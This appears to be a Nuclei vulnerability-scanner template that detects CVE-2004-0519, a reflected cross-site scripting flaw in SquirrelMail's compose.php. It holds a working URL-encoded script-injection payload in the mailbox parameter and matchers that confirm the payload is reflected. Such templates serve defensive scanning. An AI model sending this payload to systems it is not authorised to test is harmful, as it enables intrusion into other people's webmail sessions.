31 lines
950 B
YAML
31 lines
950 B
YAML
id: CVE-2004-0519
|
|
|
|
info:
|
|
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
|
reference: https://www.exploit-db.com/exploits/24068
|
|
tags: xss,squirrelmail,cve2004,cve
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|